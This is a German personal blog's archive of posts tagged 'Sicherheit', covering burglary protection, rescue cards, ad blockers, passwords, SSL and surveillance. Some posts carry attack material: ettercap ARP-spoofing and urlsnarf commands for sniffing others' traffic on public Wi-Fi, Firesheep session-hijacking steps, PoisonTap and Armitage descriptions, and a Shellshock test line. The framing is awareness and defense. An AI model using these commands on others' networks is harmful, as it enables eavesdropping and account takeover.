Beiträge zu dem Tag: “Sicherheit”

Beratung zum Einbruchschutz

Vorgestern hatten wir einen Berater der Polizei Bonn im Hause. Wir hatten so eine Beratung schon mal vor einigen Jahren in unserem ersten Haus und dachten das wir eigentlich durch die Renovierung von Fenstern und Türen schon recht gut ausgestattet sind.

Glücklicherweise wurden wir bestätigt aber natürlich kam die eine oder andere Vorschlag wie es noch ein wenig besser machen können ohne direkt ein Vermögen auszugeben.

Kann ich jedem nur empfehlen. Hat hier in Bonn nichts gekostet und müsste es auch in Eurer Gegend geben.

6.9.17
Weitere Beiträge zu: Sicherheit   Einbruch  

KFZ Rettungskarten

Vor kurzem habe ich über die Idee der KFZ Rettungskarte gelesen.

Die Idee dahinter ist das man im Auto eine Karteikarte über Karosseriestrukturen, Rückhaltesysteme und Antriebstechnik hinterlegt um Rettungskräften eine möglichst effektive Arbeit im Falle eines Unfalls ermöglicht.

Hoffentlich brauche ich die nicht.

Weitere Infos und Links gibt es hier.

8.6.17
Weitere Beiträge zu: Sicherheit   Auto  

Ein Wohnwagentraining beim ADAC

Da es demnächst mit einem Wohnwagen in den Urlaub geht und wir dies zum ersten Mal machen hatten wir uns eine Wohnwagen-Training beim ADAC gegönnt.

Ich hatte zwar schon einige Fahrsicherheitstrainings aber vor eine Vollbremsung mit einem Wohnwagen hatte ich schon Respekt.

Eine wirklich empfehlenswerte Sache die aus meiner Sicht jeder machen sollte der keine Erfahrung mit Anhängern hat.

Es ist schon gut zu wissen wie sich ein Auto verhält wenn man mit 60 km/h eine Vollbremsung hinlegt, man mit 50 km/h ein Ausweichmanöver fahren muss oder wie man um enge Ecken kommen könnten.

Rückwärts fahren wird zwar weiterhin nicht meine Schokoladenseite aber zu mindestens traue ich mir jetzt ein paar Meter auf ausreichend breiter Strasse zu.

Als Bonus gab es noch viele andere gute Tipps auf die ich nie gekommen wäre.

Absolut Empfehlenswert. Wenn man dann noch ein tolles Wetter hat ein super Tag.

26.3.17
Weitere Beiträge zu: Wohnwagen   Sicherheit   ADAC  

Ad-Blocker installieren : JETZT!

Es geht bei den Werbefiltern nicht nur um Bandbreiten, Profilbildung etc.

Es geht um Eure Sicherheit. In den nervenden Bildern können nämlich Viren drin sein.

Dieser Text ist sehr technisch aber diese Kurzzusammenfassung kann man verstehen:

For the past two months, a new exploit kit has been serving malicious code hidden in the pixels of banner ads via a malvertising campaign that has been active on several high profile websites.

7.12.16
Weitere Beiträge zu: Sicherheit  

Poisontap - Angriff auf den Browser eines gesperrten PCs

Ich habe es zwar noch nicht ausprobiert aber die Quellen gelten als seriös.

Mit einem 5$ Wegwerfcomputer und der Software Poisontap kann man gesperrte Windows und Mac Rechner auf denen noch ein Browser läuft übernehmen.

Man verbindet den Pi für ein paar Minuten mit dem USB Port und der - klaut alle Deine Cookies (damit kann man sich später anmelden) - installiert eine Backdoor für den späteren Zugriff auf Deinen Browser wenn Poisontap nicht mehr angeschlossen ist

Auf dem Video wird das verständlich beschrieben.

Lösung:

  • Zement in den USB Port
  • Verschlüsselte Festplatten und Sleep Modus verwenden.

Aber nur den PC mit einem gesperrten Bildschirm in einem Raum stehen lassen reicht nicht mehr.

16.11.16
Weitere Beiträge zu: Sicherheit  

Viele Sicherheitsgesetze ohne echte Lücken zu schließen

Die Tagesschau hat mal aufgelistet welche Verschärfungen der Sicherheitsgesetze seit den Attentaten des 11. September 2001 eingeführt worden sind.

  • 2001 - Sicherheitspaket I
  • 2002 - Sicherheitspaket II
  • 2002 - Rasterfahndung
  • 2003 - Strafrechtsverschärfung
  • 2004 - Terrorismusabwehrzentrum
  • 2004 - Zuwanderungsgesetz
  • 2005 - Luftsicherheitsgesetz
  • 2005 - Biometrischer Reisepass
  • 2006 - Anti-Terror-Datei
  • 2006 - Vorratsdatenspeicherung
  • 2008 - BKA-Gesetz
  • 2009 - Strafe für Terror-Ausbildung
  • 2011 - Nationales Cyber-Abwehrzentrum
  • 2011 - Verlängerung der Anti-Terror-Gesetze
  • 2012 - Extremismus- und Terrorabwehrzentrum
  • 2012 - Verbunddatei Rechtsextremismus
  • 2015 - Anti-Terror-Gesetze erneut verlängert
  • 2016 - Weiteres Anti-Terror-Gesetz im Bundestag

Und wenn in München ein durchgeknallter wild um sich schießt haben wir nicht die Hubschrauber um die Spezialkräfte an den Ort des Geschehens zu bekommen. (Spiegel.de)

Der Bundespolizei fehlen Lufttransportkapazitäten, seit 2013 zwei Hubschrauber kollidiert und abgestürzt sind. Sie wurden entgegen der Bitte der Bundespolizei nicht ersetzt

Wir brauchen wirklich mehr Vorratsdatenspeicherung.

13.8.16
Weitere Beiträge zu: Sicherheit   Vorratsdatenspeicherung  

Nagelrollen nicht auf dem Boden liegen lassen

Heute ein Tipp von einer Familie die Glück gehabt hat.

Diese Nagelrollen sind beim Renovieren hilfreich wenn man Tapeten perforieren möchte damit man diese mit Wasser etwas leichter von der Wand lösen kann.

Wenn man diese jedoch auf dem Boden liegen lässt besteht die Gefahr das man wenn Mann / Kind / Mädchen von der Leiter fällt in diese Nägel fallen kann.

Wir hatten Glück. Es ergab sich nur ein leichtes Muster auf dem Unterarm. Aber das kann auch hässlicher ausgehen.

6.6.16
Weitere Beiträge zu: Renovieren   Sicherheit  

Hat das FBI wirklich die Daten eines IPhone entschlüsselt?

Momentan überschlagen sich die Meldungen das es dem FBI gelungen sei verschlüsselte Daten eines IPhone ohne die Hilfe von Apple entschlüsselt zu haben.

In einem Podcast von Security Now wurde allerdings auf eine feine sprachliche Besonderheit hingewiesen.

Das Justizministerium sagt nämlich nicht, das es die Daten entschlüsselt habe. z.B. hier

The FBI has now successfully retrieved the data stored on the San Bernardino terrorist’s iPhone and therefore no longer requires the assistance from Apple required by the Court Order. The FBI is currently reviewing the information on the phone, consistent with standard investigatory procedures

Sie sagen das sie die Daten kopiert haben. Das könnte aber auch bedeuten das nur die verschlüsselten Daten kopiert wurden.

Es liegt nämlich auch die Vermutung nahe, dass das FBI die Klage nur zurückgezogen haben das sie Gefahr liefen zu verlieren.

Bin mal gespannt ob da noch was kommt.

30.3.16
Weitere Beiträge zu: Sicherheit   FBI   Apple  

Ein Auto mit drei Rädern

Man stelle sich mal vor ein Gericht in Amerika würde Ford verurteilen mal ebenso in vier Wochen ein Auto mit drei Rädern zu bauen. Die gab es doch schon und das kann doch kein Problem sein.

Ihr findet das komisch? Genauso komisch ist es das ein Gericht Apple verurteilt mal eben ein Betriebssystem für IPhones zu bauen mit dem man sicher und zuverlässig ein IPhone knacken kann.

Es ist halt nicht so einfach ein völlig neues Auto zu bauen und zu testen ob es auch immer sicher ist.

Dieses Beispiel und einige andere gute Informationen sind hier gut erklärt

20.2.16
Weitere Beiträge zu: Sicherheit   Apple  

32C3: Echte Schlösser knacken

Wieder eine Illusion die man mir genommen hat.

Zugefallene Türen die nicht abgeschlossen sind kann man mit einer Fahrradspeiche oder einem Stück PET Flasche öffnen und viele / die meisten Schlösser und Vorhängeschlösser sind mit einfachem Werkzeug zu knacken.

Nach einer klasse Einweisung von 4 Minuten bei lockpicking.org habe ich mein erstes Vorhängeschloss ohne Schlüssel geöffnet und kurz danach war das erste Türschloss dran.

Natürlich gibt es da noch sicherere Varianten aber das finde ich schon erschreckend.

Das werde ich mal weiter verfolgen.

30.12.15
Weitere Beiträge zu: 32C3   Sicherheit   lockpicking  

Boardkarten besser nicht einfach wegwerfen

Vielleicht solltet man beim Wegwerfen der Boarding Pässe etwas vorsichtiger sein. Die Barcodes auf den Karten enthalten mehr Informationen als ich bisher dachte.

Hier eine Beschreibung was man alles daraus machen kann.

8.11.15
Weitere Beiträge zu: Sicherheit   Boardkarte  

Security is not an option

Wenn es um die Frage der Verschlüsselung von Webseiten geht herrscht in vielen Köpfen immer noch der Irrglaube vor das man dies nur bei sensiblen Daten wie Kreditkarten oder Kontonummern bräuchte.

Die ganze Diskussion um Metadaten und Überwachung sollte aber gezeigt haben das dies schon seit langem nicht mehr korrekt ist.

Es geht um den Schutz der Nutzer vor Angriffen und Überwachung. Dies wird auch von den Entwicklern von Chrome

gradually change their UX to display non-secure origins as affirmatively non-secure

und Firefox

Today we are announcing our intent to phase out non-secure HTTP.

so gesehen. Beide Browser werden in naher Zukunft dazu übergehen Seiten mit HTTP als “unsicher” zu kennzeichnen

Also, wenn Ihr eine Webseite betreibt langsam in das Thema einarbeiten. Es kostet nichts (z.B. Startssl) und für die besonders mutigen sei letsencrypt.org empfohlen.

Lets Encrypt
3.11.15
Weitere Beiträge zu: Sicherheit   SSL  

Zum Sicherheitstheater an den Flughäfen

Das Video ist zwar an der amerikanischen Behörde ausgerichtet trifft aber genauso auf Deutschland zu.

Die Sicherheitsbehörden schaffen nichts außer deine Privatsphäre zu verletzen und Deine Zeit zu verschwenden.

TSA does nohting
23.10.15
Weitere Beiträge zu: TSA   Sicherheit  

Flugzeuge hacken scheint dann doch möglich zu werden

Gestern habe ich mich noch gewundert warum die Sicherheitsbehörden annehmen das man die flugzeuginternen IT Systeme angreifen kann.

Heute lese ich das das wohl wirklich denkbar ist.

Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.

Wenn das stimmt ist das eine Katastrophe. Genauso könnte man das Netzwerk für die Steuerung eines Kraftwerkes mit dem Besucher WLAN zusammenlegen.

22.4.15
Weitere Beiträge zu: Sicherheit   Flugzeuge  

Passt auf was Ihr in den USA twittert

Da twittert ein bekannter Sicherheitsexperte aus dem Flugzeug das er jetzt über das WLAN in das interne Netzwerk des Flugzeuges eindringen möchte.

alternate-text

und schon wird er bei der Landung vom FBI empfangen. Er wird verhört und seine Hardware wird beschlagnahmt.

Ich weiß nicht was mich an dieser Geschichte mehr nervös machen soll.

Die unbegrenzten Möglichkeiten der USA den Internetverkehr zu überwachen, herauszufinden auf welchem Flieger du bist und dich schon bei der Landung festzunehmen.

Oder die Tatsache, dass es Leute gibt die einen Angriff auf Flugzeugtechnick über das WLAN für möglich halten.

21.4.15
Weitere Beiträge zu: Überwachung   Sicherheit  

Mal das eigene WLAN angreifen

Schon mal eure WLAN Sicherheitseinstellungen getestet? Mit Kali Linux geht das

From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created.

Download und auf USB Stick oder CD packen. Ich habe hier einfach einen alten Netbook genommen, damit gebootet und aus den WLAN Werkzeugen Wifite gewählt. Dann die Netzwerke scannen, sein eigenes Netzwerk auswählen und laufen lassen.

Das lief jetzt 2 Tage.

alternat-txt

17.11.14
Weitere Beiträge zu: WLAN   Sicherheit  

Über sichere Kommunikation im Fall Snowden

Sehr interessant zu lesen und ein Lehrbuch für alle die irgendwann mal wirklich sicher kommunizieren wollen.

Ed Snowden Taught Me To Smuggle Secrets Past Incredible Danger. Now I Teach You.

Ich hatte mich immer schon gefragt wie diese Kommunikation zwischen Snowden und Greenwald überhaupt zustandegekommen ist.

30.10.14
Weitere Beiträge zu: Sicherheit   Prism  

IMMER, IMMER, IMMER das Rechner Kennwort vor dem Urlaub aufschreiben!!!!

sonst könnt Ihr am Ende des Urlaubs einen hässlichen Abend erleben.

Eigentlich mache ich das auch immer. Fast immer. Diesmal aber nicht. Ich glaube nach dem heutigen Abend wird meine gesamte Familie mich vor der nächten Abfahrt nötigen Ihnen das aufgeschriebene Kennwort physikalisch zu zeigen.

Wie habe ich es wieder bekommen? Ohne in die Details zu gehen. Ein Backup hat eine Rolle gespielt.

Ich nehme Anfragen per Mail entgegen.

19.10.14
Weitere Beiträge zu: Sicherheit   Kennworte  

Unbedingt die Linux Server updaten

Es wurde ein Fehler in der Bourne Shell entdeckt. Dieser Fehler erlaubt es über Umgebungsvariablen “böse Dinge” zu tun. Debian bietet schon eine Aktualisierung an.

Update Jetzt ist es auch auf Heise.de

We recommend that you upgrade your bash packages.

Testen kann man dies mit

 # env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

nach einem Update

apt-get update
apt-get upgrade
Paketlisten werden gelesen... Fertig
Abh�ngigkeitsbaum wird aufgebaut.       
Statusinformationen werden eingelesen.... Fertig
Die folgenden Pakete werden aktualisiert (Upgrade):
  bash
1 aktualisiert, 0 neu installiert, 0 zu entfernen und 0 nicht aktualisiert.
......
......
bash (4.2+dfsg-0.1+deb7u1) wird eingerichtet ...

scheint Ruhe zu sein

# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: Warnung: x: ignoring function definition attempt
bash: Fehler beim Importieren der Funktionsdefinition f�r `x'.
this is a test
24.9.14
Weitere Beiträge zu: Sicherheit   Debian  

Eine Analyse der forensischen Möglichkeiten in iOS

Die kurze Zusammenfassung der Analyse zu Identifying Back Doors, Attack Points, and Surveillance Mechanisms in iOS Devices lautet

  • Apple hat es geschafft iOS Geräte gegen allgemeine Angriffe von typischen Angreifern gut abzusichern
  • Apple kann trotzdem auf Deine privaten Daten zugreifen.

alternate-text

19.7.14
Weitere Beiträge zu: ios   Sicherheit  

Interessantes zu Kennwörtern

sind komplizierte Kennwörter wirklich sicherer? Wissenschaftlich belegt scheint das ganze noch nicht zu sein.

Kennwörter

Ich verwende einen Passwortmanager und “extrem” sicherer Kennwörter. Trotzdem nehme ich das mal als Anlass “ALLE” meine Kennwörter zu ändern. Nur so, ohne besonderen Anlass.

Wann habt Ihr das letzte mal eine Kennwortinventur gemacht?

28.6.14
Weitere Beiträge zu: Sicherheit   Kennworte  

Nette Idee: Mal die Verschlüsselung bei der Bank prüfen

Wenn ich mal viel Zeit habe mache ich das auch mal. Ich rufe mal bei der Bank an und frage nach den “Certificate Fingerprint”. (Den gibt es wirklich und man kann diesen in den Eigenschaften eines Zertifikats nachlesen)

I decided to have a little fun with this. I decided to verify the certificate of a website through an independent channel. I decided to verify the SSL certificate of my bank.

SSL Fingerprint

18.5.14
Weitere Beiträge zu: Sicherheit   Fun  

Eine Analyse von PIN Nummern

Was sind die bisher am meisten oder am wenigsten verwendeten Kombinationen von vierstelligen PINs? Eine Analyse dazu ist hier zu finden.

Und bitte beachten:

Now that we’ve learned that, historically, 8068 is (was?) the least commonly used password 4-digit PIN, please don’t go out and change yours to this! Hackers can read too!

24.4.14
Weitere Beiträge zu: Sicherheit  

Cyberkriminalität und was man dagegen tuen kann

Interessante Fakten zu Cyberkriminellen: - 30000 neue infizierte Webseiten jeden Tag - Die Masse > 80% sind klein und mittelständische Geschäfte - Statistisch gesehen sind Besuche auf Porno Seiten am sichersten

Und für alle die glauben das die Cyberkriminellen aus minderjährigen Kapuzenträgern im Keller bestehen gibt es einige schöne Fakten über die professionellen “Services” die man in diesem Kontext buchen kann.

Auch eine interessante These: 99% der Angriffe funktionieren nur, weil die einfachen aufgaben nicht erledigt werden: Updates, triviale und wiederverwendete Kennwörtern.

Cyberkriminelle

17.4.14
Weitere Beiträge zu: Sicherheit  

Heartbleed Nachbereitung abgeschlossen

So, nun ist die Nachbereitung des Heartbleed Fehlers auf meinem Server abgeschlossen. Durch die automatischen Updates von Security Fixes wurden die betroffenen Pakete automatisch erneuert.

Blieb nur noch das Austauschen der wichtigen Zertifikate. In einem Fall habe ich gleich ein neues gekauft und bei dem kostenlosen Zertifikat von StartSSL musste ich in den sauren Apfel beißen und 20Euro für die Erneuerung bezahlen. In Anbetracht der ansonsten kostenlose Zertifikate immer noch ein gutes Geschäft.

Da ich schon mal an den SSL Konfigurationen dran war habe ich den Hinweis von Thomas aufgegriffen und meine SSL Konfiguration noch etwas angepasst.

Bei dem recht verbreiteten SSL Test von SSL Labs brachte dies eine Upgrade von F auf A in der “Benotung”.

Dabei sind allerdings die Windows XP Anwender mit IE8 und IE6 “über” die Wupper gegangen. Aber die machen sich ja eh keine Gedanken über Sicherheit.

SSLLab Test Davor

SSLLab Test Danach

13.4.14
Weitere Beiträge zu: Sicherheit   SSL  

Vielleicht sollte man seine Webcam doch lieber abkleben

denn die Washington Post berichtet das es dem FBI seit einigen Jahren möglich ist die eingebaute Kamera eines PC durch eine Malware zu aktivieren ohne das dies dem Benutzer durch ein Licht angezeigt wird.

The FBI has been able to covertly activate a computer's camera -- without triggering the light that lets users know it is recording -- for several years, and has used that technique mainly in terrorism cases or the most serious criminal investigations, said Marcus Thomas, former assistant director of the FBI's Operational Technology Division in Quantico, now on the advisory board of Subsentio, a firm that helps telecommunications carriers comply with federal wiretap statutes.

Und wenn diese bis jetzt auch nur durch Strafverfolgungsbehörden in wahrscheinlich berechtigten Fällen möglich ist so ist davon auszugehen das so eine Möglichkeit irgendwann einmal von unfreundlichen Menschen genutzt wird.

10.12.13
Weitere Beiträge zu: Sicherheit  

Sommerrodelbahnen und Nässe

Sommerrodelbahnen können ja echt klasse sein. In Leutasch/Weidach gibt es eine die eine Skipiste herunter geht. Man wird echt schnell und das ganze macht wirklich Spaß.

Einen wichtigen Tipp nur. Ihr solltet wirklich vorsichtig sein wenn so eine Bahn leicht nass ist. In unserem Fall waren wir recht früh am Tage dort und waren bei den Ersten die nach 10 Uhr gefahren sind. Die Bahn war noch nicht ganz trocken und es hat mich voll aus der Bahn gehauen was mit einigen üblen Verbrennungen an Knie und Armen verbunden war.

Für mich gilt: Auf jeden Fall wieder aber nicht vor 12 Uhr.

201308-sommerrodelbahn.png

 

17.8.13
Weitere Beiträge zu: Tip   Sicherheit  

CCC Kongress: Security Nightmares [29c3]

Ein Anfangs etwas langatmiger aber mit einigen Highlights wirklich sehenswerter Rück- und Ausblick auf Tendenzen im Bereich Sicherheit.

Meine Highlights:
- Weihnachten ist wenn man nach Hause fährt und PCs der Familie fixed
- "Man in the browser Trojaner" die zu einer "Rücküberweisung auffordern
- 10 Jahre Smartmeter in Puerto Rico und schon ca 10% aller Geräte sind manipuliert
- Ein Trend zum Fernseher Firmware hacking
- Paperdays zur Verhinderung der Smartphone Demenz
- Gadget life cycle Management. Wird das gerät das ich kaufen möchte auch zukünftig noch gepachted und was passiert wenn es nicht mehr populär ist?

201301-29C3-security-nightmares.png

6.1.13
Weitere Beiträge zu: 29c3   Sicherheit  

Penetration Testing für Dummies

Jeder der einen Server im Internet stehen hat (und ich meine wirklich JEDER) sollte sich regelmäßig eine aktuelle CD von Backtrack runterladen, sich irgendein video zu "Armitage" auf youtube ansehen und den einfachen Anweisungen folgen. Das gilt auch für Personen die mit Ihrem Notebook und einer UMTS Karte ins Internet gehen.

Wenn es eine Sicherheitslücke auf Eurem Rechner gibt und ein Weg gibt diese zu umgehen dann wird sie auch gefunden.

Armitage ist ein einfaches Werkzeug um zu testen, wie man die Kontrolle über einen unsicheren PC bekommt. Es ist seehhr sehr einfach.

201212-backtrack.png

 

12.12.12
Weitere Beiträge zu: Sicherheit  

Mitlesen wohin der Nachbar im öffentlichen WLAN so surft

Für alle die noch glauben das es wahnsinnig schwierig ist in einem öffentlichen WLAN mit zulesen was die anderen so für Webseiten besuchen - Hier ein Weckruf.

Auf einem Standard Ubuntu kann man mit folgenden 3 Zeilen genau lesen was so alles im WLAN aufgesucht wird.

sudo apt-get install dsniff ettercap-text-only
sudo urlsnarf -i wlan0 | cut -d\" -f4
sudo ettercap -T -Q -M arp -i wlan0 // //

Eine etwas ausführlichere Vorführung gibt es hier

201211-url-snifffing.png


 

22.11.12
Weitere Beiträge zu: Sicherheit   WLAN  

Kinopolis Shop: Kreditkarten Infos doch verschlüsselt

Kinopolis ist ja putzig. Da sag ich noch zu meiner Liebsten: "Och, diese Formulierung mit der Sicherheit / Verschlüsselung sollten wir auch in unseren Shop aufnehmen".

Und dann sehe ich das Kinopolis die ganzen Transaktionen mit Kreditkarten gar nicht verschlüsselt. Das nenne ich aber fehlendes Interesse an der Sicherheit der Kundendaten.

Vielleicht habe ich zu wenig Ahnung von der Technik und ich übersehe hier was. Aber das halte ich schon für echte Verbrauchertäuschung

201208-kinopolis-kein-https.pngUpdate: Der Ticketschop hat ziemlich schnell auf meine Anfrage per Mail reagiert - sogar schon am Sonntag.

vielen Dank für Ihre Anfrage!

Die Übermittlung der Zahlungsdaten erfolgt immer verschlüsselt per SSL (https).
Ggf. wird das in den meisten Browsern vorhandene Schloss Symbol nicht angezeigt, da unser Shop in die Kinopolis Website eingebunden ist und Ihnen somit die Adresszeile der Kinopolis Website angezeigt wird. 

In der Tat ist wohl der eigentliche Shop "https://www.kinopolis-ticketshop.de" verschlüsselt.

201208-kinopolis-doch-https.png

 

 

11.8.12
Weitere Beiträge zu: Kinopolis   Sicherheit  

"Security by obscurity" funktioniert wirklich nicht

Für alle die einen Server im Internet haben und die glauben "das schon niemand die Verzeichnisse findet". Aus meinem Logfile. Ein Robot versucht alle Standardpfade für phpMyAdmin zu finden. (aber phpMyAdmin ist bei mir eh nicht installiert :-))

Also: Richtig absichern und nicht einfach nur verstecken.

[Thu Oct 06 15:37:58 2011]..... : URL /phpMyAdmin-2.10.0.2/
[Thu Oct 06 15:37:58 2011]..... : URL /phpMyAdmin-2.10.1.0/
[Thu Oct 06 15:37:58 2011] .....: URL /phpMyAdmin-2.10.2.0/
[Thu Oct 06 15:37:58 2011] .... : URL /phpMyAdmin-2.11.0.0/
[Thu Oct 06 15:37:58 2011]..... : URL /phpMyAdmin-2.11.1.0/
[Thu Oct 06 15:37:58 2011] .....: URL /phpMyAdmin-2.11.1.1/
[Thu Oct 06 15:37:58 2011]......: URL /phpMyAdmin-2.11.1.2/
[Thu Oct 06 15:37:58 2011] .....: URL /phpMyAdmin-2.11.2.0/
[Thu Oct 06 15:37:58 2011]..... : URL /phpMyAdmin-2.11.2.1/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.2.2/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.3.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.4.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.5.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.5.1/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.5.2/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.6.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.7.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.7.1/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.8.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.9.0/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.9.1/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.9.2/
[Thu Oct 06 15:37:59 2011] .....: URL /phpMyAdmin-2.11.9.3/

 

6.10.11
Weitere Beiträge zu: Linux   Sicherheit  

Facebook und Twitter Hacking für Jedermann mit Firesheep

Mit Firesheep bekommt man ein kleines Firefox Plugin geliefert das die Pakete in einem unverschlüsselten WLANs nach Login Daten für bekannte Websites überwacht. Das Werkzeug wurde von einem Studenten veröffentlicht um auf die Problemetik von Session Daten in unverschlüsselten Netzen aufmerksam zu machen und gelangte schnell in die TopTen der Downloads. Geht ganz einfach: Plugin für Firefox installieren. Start Capturing drücken und warten bis sich im Netzwerk einer bei Twitter oder Facebook anmeldet. Dann taucht der Name auf, man klickt drauf und ist angemeldet.

Betroffen sind momentan die Seiten von  Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Facebook, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost , tumblr, Twitter, WordPress, Yahoo and Yelp. Mit technischem Wissen kann das aber ohne Probleme erweitert werden.

201010-firesheep.jpgKern des Problem ist die Tatsache, daß in den meisten Fällen nur die Anmeldung zwischen einem Benutzer und einer Webseite verschlüssel ist. Da die Verschlüsselung Prozessorleistung "raubt" wird der weitere Datenaustausch dann unverschlüsselt durchgeführt. Dort wird dann der Benutzername und die Session Cookies im Klartext ausgetauscht. Und mit diesen beiden kann man sich dann mit dem Plugin einfach als "die andere Person ausgeben"

Die Technik ist nicht neu nur wurde sie hier erstmals "für jedermann" nutzbar gemacht.

Was hilft?

Eigentlich nur die verschlüsselte Kommuniktation mit allen Websiten bei denen man sich anmeldet. Leider reicht es nicht aus die Seite beim ersten mal mit https aufrufen. Die internen Links sind dann meistens nur mit http. Für die gängigen Websites ist https-everywhere eine Lösung. Wenn man die Websites besucht wird einfach in allen Links das http durch https ausgetauscht. Betreibt man eine Website auf der sich Benutzer anmelden sollte man mittelfristig den Betrieb ganz auf https umstellen, nicht nur die Anmeldung.

Frau Aigner das wäre doch mal etwas für Sie um die Verbraucher vor echtem Schaden zu schützen und einen Ihrer Lieblinge anzugreifen: Facebook

Sie brauchen nur den Satz zu sagen

Facebook und Twitter müssen den Datenschutz ernst nehmen und müssen sofort auf Verschlüsselung umstellen!

Ist nicht schwierig und stimmt sogar. Aber wahrscheinlich brauchen Sie noch einige Wochen um das Problem zu verstehen. Bis dahin beschäftigen Sie sich wahrscheinlich lieber um Streetview.

31.10.10
Weitere Beiträge zu: Sicherheit   Firesheep  

Dies ist ein privater Blog von Hagen Bauer- berufstätiger Vater, Ehemann, Naturliebhaber, Läufer, Zelter, technikverliebt.


Creative Commons License
This blog is licensed under a Creative Commons License